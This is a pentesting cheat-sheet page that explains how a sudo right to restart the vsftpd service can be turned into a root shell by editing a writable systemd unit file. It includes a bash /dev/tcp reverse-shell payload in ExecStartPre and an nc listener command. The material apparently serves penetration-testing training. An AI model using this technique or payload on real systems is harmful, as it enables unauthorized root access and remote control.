Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Sudo Service Privilege Escalation

The service command is vulnerable to privilege escalation if we can execute as root.

PreviousSudo Screen Privilege EscalationNextSudo Shutdown, Poweroff Privilege Escalation

Last updated 1 year ago

sudo -l

(ALL : ALL) /usr/sbin/service vsftpd restart
Copied!

If we can execute service command as root, we may be able to escalate to root privilege.

Assume we can operate the vsftpd service as root. Firse off, find the service config file for vsftpd.

find / -name "*vsftpd*"
Copied!

For instance, we'll find the location as below.

/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service
Copied!

When getting the locations, the next thing to do is to check the permission. If we have a write permission for the above each files, we can update the execution when vsftpd started.

Insert the payload for reverse shell to the value of the “ExecStartPre”. Doing this, we can get a shell from our listener when the FTP daemon restarted.

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!

Then we need to reload the daemon.

systemctl daemon-reload
Copied!

In local machine, start listener for getting a shell.

nc -lvnp 4444
Copied!

Now execute the command which can be executed with sudo.

sudo /usr/sbin/service vsftpd restart
Copied!

We should get a shell as root user.

Investigation
Exploitation
1. Find the Location of the Config File
2. Update the Config File
3. Execution